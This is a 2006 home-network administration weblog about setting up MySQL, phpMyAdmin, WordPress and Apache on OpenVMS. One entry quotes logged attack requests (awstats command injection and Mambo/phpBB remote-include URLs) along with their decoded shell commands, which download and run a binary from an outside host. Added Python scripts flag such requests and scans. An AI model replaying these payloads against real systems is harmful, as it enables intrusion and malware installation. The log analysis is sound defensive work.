SYSMGR

We're a bunch of Computers: Diana, Daphne, and Dido, called the 3D-cluster, running OpenVMS, Io running OpenVMS as well (in some obscure role in the network), Aphrodite, Athene and Irene running WindowsXP-Pro (SP2, of course) and Cerberus at the edge of the Network, with Charon, also running Linux, as standby. SYSMGR takes care of us.

Wednesday, March 29

29-Mar-2006

Wordpress running
but with some troubles to be solved: http://www.grootersnet.nl/sysmgr/log/weblog/index.php contains some of them.

Weird place?
Perhaps; But this way most scripts will fail since it's not the default location.

But I will keep a strong eye on security!

Tuesday, March 28

28-Mar-2006

PHPMyAdmin works
That is: issue located and created a work-around: It's in the URL; that contains - at its end - the string:
&collation_connection=utf8_unicode_ci
and that's just what gives the error.
Changed that - in the browser address line - to read:
&collation_connection=utf8_general_ci
and behold: IT WORKS. No matter from where (Don't think you can access it - it's somewhere else ;-)
Switching time
this weekend has once again proved to be a non-issue.
Too busy with other things
but just this morning could watch the Apache logs. Found just two abuse attempts in ACCESS_LOG:

69.13.213.69 - - [22/Mar/2006:03:24:02 +0100]
GETs these URLs, at least: tries to (but gets 404-errors on each):

/awstats/awstats.pl?configdir=echo;echo%20YYY;cd%20%2ftmp%3bwget%2083%2e16%2e187%2e6%2fcacti%3bchmod%20%2bx%20cacti%3b%2e%2fcacti;echo%20YYY;echo
/cgi-bin/awstats.pl?configdir=echo;echo%20YYY;cd%20%2ftmp%3bwget%2083%2e16%2e187%2e6%2fcacti%3bchmod%20%2bx%20cacti%3b%2e%2fcacti;echo%20YYY;echo
/cgi-bin/awstats/awstats.pl?configdir=echo;echo%20YYY;cd%20%2ftmp%3bwget%2083%2e16%2e187%2e6%2fcacti%3bchmod%20%2bx%20cacti%3b%2e%2fcacti;echo%20YYY;echo
/index.php?option=com_content&do_pdf=1&id=1index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://83.16.187.6/cmd.gif?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo
/mambo/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://83.16.187.6/cmd.gif?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo
/cvs/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://83.16.187.6/cmd.gif?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo
/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo
/Forums/admin/admin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo
/phpBB2/admin/admin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo
/phpBB2/admin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo

He's busy "hacking his way in", because this is his command in plain text:

on "awstats" he does:

echo;
echo YYY;
cd /tmp;
wget 83.16.187.6/cacti;
chmod +x cacti;
./cacti;
echo YYY;
echo

on the other lines:

http://83.16.187.6/cmd.gif?&cmd=
cd /tmp;
wget 83.16.187.6/cacti;
chmod 744 cacti;
./cacti;
echo YYY;
echo

Actually the same.
Who is this:

The source is 69.13.213.69:

OrgName: C I Host
OrgID: CIHS
Address: 1851 Central Drive
Address: #110
City: Bedford
StateProv: TX
PostalCode: 76112
Country: US

NetRange: 69.13.0.0 - 69.13.255.255
CIDR: 69.13.0.0/16
NetName: CIHS
NetHandle: NET-69-13-0-0-1
Parent: NET-69-0-0-0-0
NetType: Direct Allocation
NameServer: NS.CIHOST.COM
NameServer: NS2.CIHOST.COM
Comment:
RegDate: 2002-12-04
Updated: 2003-10-10

RTechHandle: NC61-ARIN
RTechName: Network Operations Center
RTechPhone: +1-888-868-9931
RTechEmail: noc@cihost.com

OrgAbuseHandle: ABUSE821-ARIN
OrgAbuseName: Abuse
OrgAbusePhone: +1-888-868-9931
OrgAbuseEmail: abuse@cihost.com

But he references 83.16.187.6 (in the URL) so I guess it's likely to be his "home address" :

inetnum: 83.16.187.4 - 83.16.187.7
netname: PRZEDSIBIORSTWOT
descr: PRZEDSIEBIORSTWO TELNET
descr: LOMZA
descr: POLAND
country: PL
admin-c: PZ823-RIPE
tech-c: TPHT
status: ASSIGNED PA
mnt-by: TPNET
source: RIPE # Filtered

role: TP S.A. Hostmaster
address: TP S.A. "POLPAK"
address: ul. Nowogrodzka 47A
address: 00-695 Warszawa
address: Poland
phone: +48 22 6252383
fax-no: +48 22 6225182
remarks: trouble: Network problems: hostmaster@tpnet.pl
remarks: trouble: Abuse and spam notification: abuse@tpnet.pl
remarks: trouble: DNS problems: dns@tpnet.pl
remarks: trouble: Routing problems: registry@tpnet.pl
admin-c: TK569-RIPE
tech-c: TK569-RIPE
tech-c: JS1838-RIPE
nic-hdl: TPHT
remarks: ! - ! - ! - ! - ! - ! - ! - ! - ! - ! - !
remarks: Please send spam and abuse notification only to abuse@tpnet.pl
remarks: ! - ! - ! - ! - ! - ! - ! - ! - ! - ! - !
mnt-by: TPNET
abuse-mailbox: abuse@tpnet.pl
source: RIPE # Filtered

Both will be notified.
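
As an added example (not part of the original log entry), the decoding done by hand above can be automated: this Python script percent-decodes each query parameter of a logged request and labels values that are remote URLs or chained shell commands. The sample lines reuse request paths from the excerpt; the HTTP method, protocol, response size, the 192.0.2.10 line and all function names are assumptions.

```python
import re
from urllib.parse import unquote

# Access-log lines built from request paths quoted in the log excerpt above.
# Method, protocol, response size and the final benign line are constructed.
SAMPLE_LOG = [
    '69.13.213.69 - - [22/Mar/2006:03:24:02 +0100] "GET /awstats/awstats.pl'
    '?configdir=echo;echo%20YYY;cd%20%2ftmp%3bwget%2083%2e16%2e187%2e6%2fcacti'
    '%3bchmod%20%2bx%20cacti%3b%2e%2fcacti;echo%20YYY;echo HTTP/1.1" 404 316',
    '69.13.213.69 - - [22/Mar/2006:03:24:02 +0100] "GET /mambo/index.php'
    '?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS='
    '&mosConfig_absolute_path=http://83.16.187.6/cmd.gif?&cmd=cd%20/tmp;'
    'wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo'
    ' HTTP/1.1" 404 316',
    '192.0.2.10 - - [22/Mar/2006:03:25:10 +0100] "GET /index.php'
    '?option=com_content&do_pdf=1&id=1 HTTP/1.1" 200 5120',
]

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.I)
SHELL_WORD = re.compile(r'(?:^|[;|&`\s])(?:wget|curl|chmod|cd|sh|echo)\b')

def classify(target):
    """Decode each query parameter and label the suspicious ones."""
    findings = []
    # Split on '&' by hand: ';' is part of these payloads and must stay
    # inside the value rather than being treated as a separator.
    for part in target.partition('?')[2].split('&'):
        name, _, raw = part.partition('=')
        value = unquote(raw)
        if REMOTE_URL.match(value):
            findings.append(('remote-include', unquote(name), value))
        elif ';' in value and SHELL_WORD.search(value):
            findings.append(('shell-command', unquote(name), value))
    return findings

def triage(lines):
    """Return one record per log line that carries a suspicious parameter."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target, status = m.group(1), m.group(2), int(m.group(3))
        findings = classify(target)
        if findings:
            # A status below 400 means some script answered: check that host.
            hits.append({'ip': ip, 'path': target.partition('?')[0],
                         'served': status < 400, 'findings': findings})
    return hits

if __name__ == '__main__':
    for hit in triage(SAMPLE_LOG):
        print(hit['ip'], hit['path'], 'SERVED' if hit['served'] else 'rejected')
        for kind, name, value in hit['findings']:
            print('   ', kind, name, '=', value)
```

The `served` flag separates noise (404, nothing installed at that path) from requests that need follow-up on the host itself.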

The second is more straightforward - and a good proof NOT to install on default locations:

85.10.193.134 - - [26/Mar/2006:21:16:33 +0200] "GET /thisdoesnotexistahaha.php HTTP/1.1" 404 316

no, of course not. Nor do these:

/modules/newbb_plus/class/forumpollrenderer.php
/WebCalendar/tools/send_reminders.php
/webcalendar/tools/send_reminders.php
/cal/tools/send_reminders.php
/Calendar/tools/send_reminders.php
/calendar/tools/send_reminders.php
/protection.php
/modules/AllMyGuests/signin.php
/classes.php
/extensions/moblog/moblog_lib.php
/modules/newbb_plus/class/forumpollrenderer.php
/mambo/index2.php?option=com_content&do_pdf=1&id=1
/mambo/index.php?option=com_content&do_pdf=1&id=1
/index2.php?option=com_content&do_pdf=1&id=1
/index.php?option=com_content&do_pdf=1&id=1
/cvs/index2.php?option=com_content&do_pdf=1&id=1
/cvs/index.php?option=com_content&do_pdf=1&id=1
/modules/coppermine/themes/default/theme.php
/awstats.pl
/cgi-bin/awstats.pl
/scgi-bin/awstats.pl
/awstats/awstats.pl
/cgi-bin/awstats/awstats.pl
/scgi-bin/awstats/awstats.pl
/cgi/awstats/awstats.pl
/scgi/awstats/awstats.pl
/scripts/awstats.pl
/cgi-bin/awstats/awstats.pl
/scgi-bin/awstats/awstats.pl
/cgi-bin/stats/awstats.pl
/scgi-bin/stats/awstats.pl
/stats/awstats.pl
/blog/xmlrpc.php
/blog/xmlsrv/xmlrpc.php
/blogs/xmlsrv/xmlrpc.php
/drupal/xmlrpc.php
/phpgroupware/xmlrpc.php
/wordpress/xmlrpc.php
/xmlrpc.php
/xmlrpc/xmlrpc.php
/xmlsrv/xmlrpc.php
/services/xmlrpc.php
/html/xmlrpc.php

This source is:

inetnum: 85.10.192.0 - 85.10.207.255
netname: HETZNER-RZ-NBG-NET
descr: Hetzner Online AG
descr: Datacenter Nuernberg
country: DE
admin-c: HOAC1-RIPE
tech-c: HOAC1-RIPE
status: ASSIGNED PA
mnt-by: HOS-GUN
mnt-lower: HOS-GUN
mnt-routes: HOS-GUN
source: RIPE # Filtered

role: Hetzner Online AG - Contact Role
address: Hetzner Online AG
address: Industriestr. 6
address: D-91710 Gunzenhausen
address: Germany
phone: +49 9831 61 00 61
fax-no: +49 9831 61 00 62
e-mail: ripe@hetzner.de
remarks: *************************************************
remarks: * For spam/abuse/security issues please contact *
remarks: * abuse@hetzner.de , not this address *
remarks: *************************************************


Again a notification to be sent.
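
An added example, not part of the original log entry: a probe run like the one above shows up as many distinct missing paths requested by one client in a short time, which this Python script detects with a sliding window over the 404 entries. The paths come from the list above; the one-second spacing of the timestamps, the 192.0.2.10 client, the window and threshold values and the function names are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+) [^"]*" (\d{3}) ')

# Paths taken from the probe list above; the per-request timestamps (one
# second apart) and the 192.0.2.10 client are constructed for this example.
PROBED = ['/thisdoesnotexistahaha.php', '/awstats.pl', '/cgi-bin/awstats.pl',
          '/xmlrpc.php', '/blog/xmlrpc.php', '/wordpress/xmlrpc.php',
          '/WebCalendar/tools/send_reminders.php',
          '/mambo/index2.php?option=com_content&do_pdf=1&id=1']
SAMPLE_LOG = [
    f'85.10.193.134 - - [26/Mar/2006:21:16:{33 + i:02d} +0200] '
    f'"GET {path} HTTP/1.1" 404 316' for i, path in enumerate(PROBED)
] + [
    '192.0.2.10 - - [26/Mar/2006:21:16:40 +0200] "GET /favicon.ico HTTP/1.1" 404 316',
    '192.0.2.10 - - [26/Mar/2006:21:16:41 +0200] "GET /index.html HTTP/1.1" 200 2048',
]

def parse(line):
    """Return (ip, timestamp, path without query, status) or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, stamp, target, status = m.groups()
    when = datetime.strptime(stamp, '%d/%b/%Y:%H:%M:%S %z')
    return ip, when, target.partition('?')[0], int(status)

def find_scanners(lines, window=timedelta(seconds=60), threshold=5):
    """Map client IP -> most distinct 404 paths seen inside one window."""
    misses = defaultdict(list)
    for rec in filter(None, map(parse, lines)):
        ip, when, path, status = rec
        if status == 404:
            misses[ip].append((when, path))
    flagged = {}
    for ip, events in misses.items():
        events.sort()
        start = best = 0
        for end, (when, _) in enumerate(events):
            # Shrink the window from the left until it spans <= `window`.
            while when - events[start][0] > window:
                start += 1
            best = max(best, len({p for _, p in events[start:end + 1]}))
        if best >= threshold:
            flagged[ip] = best
    return flagged

if __name__ == '__main__':
    for ip, count in find_scanners(SAMPLE_LOG).items():
        print(f'{ip}: {count} distinct missing paths within 60s')
```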

Saturday, March 25

25-Mar-2006

PHP applications
seem not to work fully. Ok, they get installed all right, protections are set, install scripts can be started and finish properly, the database schema is created, initialized and populated - but getting the application to really work is another issue. e107 simply fails to recognize index.php (page gives 404 error but it IS there), and wordpress will not show up the text page since it cannot find a column.
Have to dig into that - and for security reasons, I disabled access to both E107 and Wordpress. (there may be known issues with e107 - the reference site has no more data after the last attempts)
phpadmin
works fine from Athene, but I still have trouble accessing the database from Diana itself, or Aphrodite. Don't know what it might be...
Switching to summertime tonight!

Monday, March 20

20-Mar-2006

MySQL issue?
Since MySQL seems to be up and running, and PHP is active already, the next step is obvious: management of the MySQL database using a PHP-based application - phpMyAdmin.
It runs on Athene already, to find out how it works, so on Diana I did the same: Got the latest version (2.8.0.2), and created a database schema (because there was a script to create a schema, and on Athene there is one as well).

It didn't work: no such user.

Rats - I should have read the installation manuals better beforehand: I needed the user to be added in mysql. Did that, it accepted the username and password, but next signalled:

Client does not support authentication protocol requested by server; consider upgrading MySQL client

Ok, I know about that, I read about that on http://www.issinoho.com:8080/phpbb2/viewtopic.php?t=2

It seems that the latest PHP-on-VMS is built against an older MySQL version (3.x instead of 4.0. Simple mismatch), but I can live with that - for the moment. (When will a new, really recent version of php_mysql be delivered, or is it available somewhere else?)

So I followed the advice, changed the password using OLD_PASSWORD, and retried, but got another surprising error:



MySQL's help wasn't very helpful either:



So I start searching and I found this string in some files within phpMyAdmin, and in the script creating the schema. Changed them to UTF8_bin - all - and recreated the database. No difference, but the same error mentioning utf8 now.

Reversed it all to the original, and behold:

I COULD LOG IN...

But the output was a bit different than I thought: I couldn't do on Diana what I can do on Athene (Ok, that one uses MySQL5, but that's not a reason why I don't see the phpmyadmin database, cannot access mysql tables that I can see on Athene. Or is it?)

Anyway, I changed this user's privileges to be able to do everything from Diana's terminal, and started SWB to access phpMyAdmin again.

ALAS - the situation returned:

#1273 Unknown collation - utf8_unicode_ci

so back to the basic problem: something is definitely wrong. But the issue is how to get around this... (The same problem arises when accessing phpMyAdmin over the Internet)
Log cycle and publish
Log scan hasn't run last night - at least, it did run but didn't copy anything. Obvious - since the disk on which the webs are located has changed, I needed to adapt these procedures as well, and resubmitted. Secured the copies of apache's logs as well by incorporating the version number in the filename so these would be unique and therefore cannot be purged away - and ran the copy-script and after that, recreated the index. See tomorrow if that's all done (Note: It is) so next to see how FTP can be handled likewise.

Thursday, March 16

16-Mar-2006

Searching documents
For a project I'm looking for a way to easily search freetext in an application's documents (plain ASCII created on VMS) using a web interface. I found htdig via the Apache web pages at http://www.pdv-systeme.de/users/martinv/htdig/ and that proved very easy and good working (with some remarks - there are some wishes left, but these require some code changes in htsearch).
You can bet on it: once demonstrated, there came the request to include Microsoft Word and PDF files as well. For that, I got the utilities to do that from the same site, installed them, pushed some Word documents and PDF files onto the VMS box and let the analysis-job run again.
Result: I could locate the Word documents using the search page! PDF files however, proved to be another matter. Digging through the logfile and the file contents in ASCII, I found that some are in PDF 1.0 format and these are fine (Great: the ones that worked were created on VMS using txt2pdf.exe by Craig Berry). But the ones I pushed (all PDF 1.3 created by a (Windows based) java application) are not.
First impression was it was the conversion program, so I downloaded the latest version of the retrieval conversion program used (pdftotext.exe) from http://frank.harvard.edu/~coldwell/vms/xpdf.html (pdftotext is part of the xpdf package), but the problem is elsewhere: the logfiles show the file is actually retrieved but for some reason, not properly handled by the HTDIG program that does the retrieval.
Time to retrieve the (VMS) files and dig into it.
MySQL database
The database has been created! A few adaptions were made to the configuration file (the database is stored on another location than the default) and therefore I had to change the ownership of that location. Once that was done, it was a piece of cake!
Next task is to determine what software will be used for the new look-and-feel of the web(s)
Security
Funny thing found in operator.log:

%%%%%%%%%%% OPCOM 16-MAR-2006 21:13:03.24 %%%%%%%%%%%
Message from user TCPIP$SMTP on DIANA
TCPIP-W-SMTP_NOSPAMRLY, relay to <new_openrelay_test@internl.net>from client IP address 217.149.193.37 is suspected SPAM


This is my ISP testing the relay - to see whether it's an open one (not allowed) or not. Of course, it isn't.
They used to test regularly - but it has been suspended quite some time.
Other things found, wonder if that's to worry about:

%%%%%%%%%%% OPCOM 16-MAR-2006 21:16:55.42 %%%%%%%%%%%
Message from user TCPIP TELNET on DIANA
TELNET Logout Request from Remote Host: athene.intra.grootersnet.nl Port: 1143

%%%%%%%%%%% OPCOM 16-MAR-2006 21:17:12.19 %%%%%%%%%%%
Message from user INTERnet on DIANA
TELNET Login from Host: CERBEROS Port: 1192
...
%%%%%%%%%%% OPCOM 16-MAR-2006 22:22:02.97 %%%%%%%%%%%
Message from user TCPIP TELNET on DIANA
TELNET Logout Request from Remote Host: CERBEROS Port: 1192


I know I had opened a TELNET session on Athene using my access point, had a problem so logged out and in again. It seems that in some way, this is transferred to CERBEROS???
CERBEROS is the LINKSYS router and that has no TELNET software...
Mistake
I have two diskshelves connected to the HSZ50 but one of them doesn't contain production drives - so to save some power cost, I unplugged it.
Next, I made a mistake by hitting the reset button on the HSZ50. But Diana just signalled it lost connection to the system disk - and continues:

%%%%%%%%%%% OPCOM 16-MAR-2006 22:41:57.66 %%%%%%%%%%%
Device $116$DKA100: (DIANA PKB) is offline.
Mount verification is in progress.

%%%%%%%%%%% OPCOM 16-MAR-2006 22:41:57.68 %%%%%%%%%%%
Mount verification has completed for device $116$DKA100: (DIANA PKB)


This message occurred a number of times, but that was about it. No crash, no corruption....

15-Mar-2006

Finishing touch
on some management procedures, to copy and process logfiles. There were some changes that had to be incorporated, and assure the saving of old (and new) Apache logfiles. I kept all 1.3-1 files together in one archive directory and the 2.1 in the normal one - and changed the way they are copied. To assure the files are not purged away, the name must change when copying - similar to the operator logs. Well, this is just one command procedure that needs an adaption, so it's no big deal (it will also prevent zero-length files being copied - there is no need for these files)
MySQL
I installed MySQL - that is: ran the product installation but still have to do the final part: creation of the database and preparing the use.
WEBMAIL matters
YAHMAIL has a problem. I can read messages but sending them is always failing for some reason: "Internal inconsistency error". No big deal, though, since its successor (I have currently 0.4.1 in beta) is improving with each release; there are of course some issues, but these are fed back to the author (Mark Daniel). Anyone wanting to give it a try: you can get it at http://wasd.vsm.com.au/wasd/.

Tuesday, March 14

14-Mar-2006

Mail is Ok
Got a message this morning from soyMail's author that the corruption message is to be ignored - the message was sent anyway.
Sent him a Dutch translation of the texts, there is a minor problem that some won't fit on the buttons, but he'll experiment to make it fit (enlarging the buttons, for instance)

The web page has a problem, which is easy to be solved: the counter's files are missing. A new version is available, so I will add that one.

Monday, March 13

13-Mar-2006

A final attempt?
Got the new soyMAIL version (0.4.1) and installed it. It works fine but sending attachments SEEM to fail: some corruption was signalled.
Rebooted using the HSZ50 - so the new system disk, found some DECNet problems, to be expected since one of the NICs isn't connected yet and that signals a message in OPERATOR.LOG every 6 seconds or so. Disabled that interface - and DTSS since there is no need for DTSS since Diana's time is controlled by NTP and there is just this server.

Soymail is working fine now!

Prepared for the installation of the database software (MySQL, RdB) but time was running out, and I need to rethink the intended structure. Well, leave that for next time.

Diana is running on its new system disk. See how everything goes!

Sunday, March 12

12-Mar-2006

Well, NOT entirely satisfied
as was found that access from the internet was still a problem. No mail, no web access, just telnet would get through. As it turned out, it was the router that needed a change and reset. That was all - mail gets through now, as well as web requests and FTP connections.
Nevertheless - reversed anyway, since Yahmail couldn't send mail (Internal inconsistency error) and Soymail couldn't either because the return address was overwritten - Ok, still in Beta so it could be expected to contain an error. Informed the author - might be a bug. Will get the new version later this weekend.

Saturday, March 11

11-Mar-2006

Moved the system
to boot from the shared disk. Well, it already did but the problem I still had was starting the new Apache version and keep all webs intact. Solving this required a minor adaption to the new Apache configuration file: I just copied all the virtual hosts from the 1.3 config file to the new (2.1) one, added the VMS authentication module and moved the includes for SSL, PHP, Perl and Tomcat to the right position - just in front of the virtual hosts.
Restarted it: Et voila!

Even better: Tomcat does start in batch! Great improvement.

The only thing that's now wrong is that specifying Diana as a host will cause the Apache page to show up, instead of the normal entry. But that is just a minor issue - just removing the default DocumentRoot.

Another thing is that links to ScriptAlias'd directories seem to require a ".COM" extension. It broke both YAHMAIL and soyMail beta. Again, this is minor and can surely be solved in the configuration script.

This took about an hour, in all. Not bad.

Tested some issues with soymail that I had reported: mainly, the inability to upload files. That went Ok with this Apache version, it might be it's just an Apache 1.3 problem.

So far so good. Leave the system as it is now, and go on tomorrow!